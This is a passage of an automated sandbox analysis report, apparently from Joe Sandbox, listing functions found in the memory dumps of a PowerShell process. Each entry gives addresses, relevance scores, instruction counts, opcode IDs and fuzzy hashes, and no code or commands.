                                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_77e0000_powershell.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: fe6fe8e85e9bf8966ad3d185ab3c5437d66c9bef64368abcb3515bf18c574e3f
                                                                                                                                                                                                            • Instruction ID: e8631b39275d60db775d755974852fd8090e17358186d1e1f1f8bdcafab9a5a3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe6fe8e85e9bf8966ad3d185ab3c5437d66c9bef64368abcb3515bf18c574e3f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1341EBF1B0020ADFCB108F688503A7E7BE5BF892D4F5989A5D805DF251DB31D941C792
                                                                                                                                                                                                            Function 04CA4198 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000E.00000002.2588036355.0000000004CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_4ca0000_powershell.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 6cdca27a68b39140a1438457cbae54c34fc6b8a4958c81d0f66f63899ebeac3e
                                                                                                                                                                                                            • Instruction ID: 4b19b0d8f6e43b6fcfad983aae802b94c65e6e46e1ccd5f646342d3f3bf34fd2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6cdca27a68b39140a1438457cbae54c34fc6b8a4958c81d0f66f63899ebeac3e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 664118B4A001069FCB09CF89C5959BAFBB2FF48314B11865AD505AB364C735FD50CFA4
                                                                                                                                                                                                            Function 04CA3A77 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000E.00000002.2588036355.0000000004CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_4ca0000_powershell.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: fb9c2ba7b4148d8dfad4d9c94d9671e7240565c6df4cadaf6e0b39ea90ef068a
                                                                                                                                                                                                            • Instruction ID: b123c803a0d3cdc6731397857b1bb1cab544393d6c940f9edb71316f821f038a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb9c2ba7b4148d8dfad4d9c94d9671e7240565c6df4cadaf6e0b39ea90ef068a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5315A74A001068FCB09CF98C598ABEFBB2FF48318B15865AD411AB264C776FD60CB94
                                                                                                                                                                                                            Function 04CA3000 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000E.00000002.2588036355.0000000004CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_4ca0000_powershell.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: e564e960dadc3faaceabf7245731577cf47b7f0b3900da8861b54cd13e7ad940
                                                                                                                                                                                                            • Instruction ID: 7dcd5c2318a1a541df7924623be100326fe620c9a2bd74cacafd565da786ee8e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e564e960dadc3faaceabf7245731577cf47b7f0b3900da8861b54cd13e7ad940
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F214CB5A0025A9FCB00CF98C8809AABBB1FF89314B158499E808EB355C731FD51CBA1
                                                                                                                                                                                                            Function 04CA3010 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000E.00000002.2588036355.0000000004CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_4ca0000_powershell.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 97eec67033cdd21093ec551a9a713d632493c582e3dd4c4e2f3c009897a74073
                                                                                                                                                                                                            • Instruction ID: 93e15f49106d5671486b852783af7fee4990c972f89488f47ebf777891c6145b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97eec67033cdd21093ec551a9a713d632493c582e3dd4c4e2f3c009897a74073
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90215EB4A042598FCB00CF9DC4909AABBB1FF49300B14849AE815EB362C735FD41CBA1
                                                                                                                                                                                                            Function 047CD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000E.00000002.2586868324.00000000047CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 047CD000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_47cd000_powershell.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 3d78931cb4171c58e185f1477c6412f2f5d0cfd006aa6707fd293c3acfd3e436
                                                                                                                                                                                                            • Instruction ID: 8f85dd37d67d24232c3e625ef0275317f95a10bbdc949ccfcc568e873a098afc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d78931cb4171c58e185f1477c6412f2f5d0cfd006aa6707fd293c3acfd3e436
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7201A771509340AAE7204E2EED84767BF98EF45324F18C93EED484A346D679A886C6B1
                                                                                                                                                                                                            Function 047CD005 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000E.00000002.2586868324.00000000047CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 047CD000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_47cd000_powershell.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: af4caa414c6394a3ee01a59442e974e01af53a0902053b83ec54e63a26b12b7f
                                                                                                                                                                                                            • Instruction ID: 74ed8f96a69dc58f696ccd907cba6b3272de0e1f821be3092112e809886bc1da
                                                                                                                                                                                                            • Opcode Fuzzy Hash: af4caa414c6394a3ee01a59442e974e01af53a0902053b83ec54e63a26b12b7f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A101406100E3C05ED7128B259C94B62BFB4EF43224F1DC5DFD9888F2A3C2699849C772

                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                            Function 077E0DF8 Relevance: 9.2, Strings: 7, Instructions: 492COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000E.00000002.2612717669.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_77e0000_powershell.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                                                            • API String ID: 0-1608119003
                                                                                                                                                                                                            • Opcode ID: 4aa43cd2eea25fcbfebf887f7f692ca6af0266c8c45faf0092073658d5dcff65
                                                                                                                                                                                                            • Instruction ID: cb336173d239f25ebbdb66c766924adb55c083a644955d878a718da1325299b3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4aa43cd2eea25fcbfebf887f7f692ca6af0266c8c45faf0092073658d5dcff65
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AF139B1B003098FD7159B6998017AABBEAAFCA351F24887BD405CF351DB32DC45C7A2
                                                                                                                                                                                                            Function 077E0148 Relevance: 9.1, Strings: 7, Instructions: 325COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000E.00000002.2612717669.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_77e0000_powershell.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                                                            • API String ID: 0-1608119003
                                                                                                                                                                                                            • Opcode ID: 36822f5ec34ac77174afbeed7be9c407811f26cd73fc435aa2f21b429dbdd8b1
                                                                                                                                                                                                            • Instruction ID: 5b5e425be9f7524ddd037c6315ccc37c49504d8214dfeb3cc3f17bb13041feb2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36822f5ec34ac77174afbeed7be9c407811f26cd73fc435aa2f21b429dbdd8b1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54A149B17043568FC7154BB9981077ABBF9AFCA250F2888AFD445CF252DA72C845C7A2
                                                                                                                                                                                                            Function 077E2C10 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000E.00000002.2612717669.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_77e0000_powershell.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                                            • API String ID: 0-2125118731
                                                                                                                                                                                                            • Opcode ID: 8bf9cd5ff11eaee3a9dbabb087726f8fb15c1a3522b2bb3e3770a3404a1fdb4b
                                                                                                                                                                                                            • Instruction ID: 6487f20f57934acf06bc0ae87c025c92edd0c7a6220f79f7c3bf49440fab0596
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8bf9cd5ff11eaee3a9dbabb087726f8fb15c1a3522b2bb3e3770a3404a1fdb4b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 512137B174070A5BEB38557ADC40B2766EEBBC9755F24C82AA405CF3A6DD36C880C261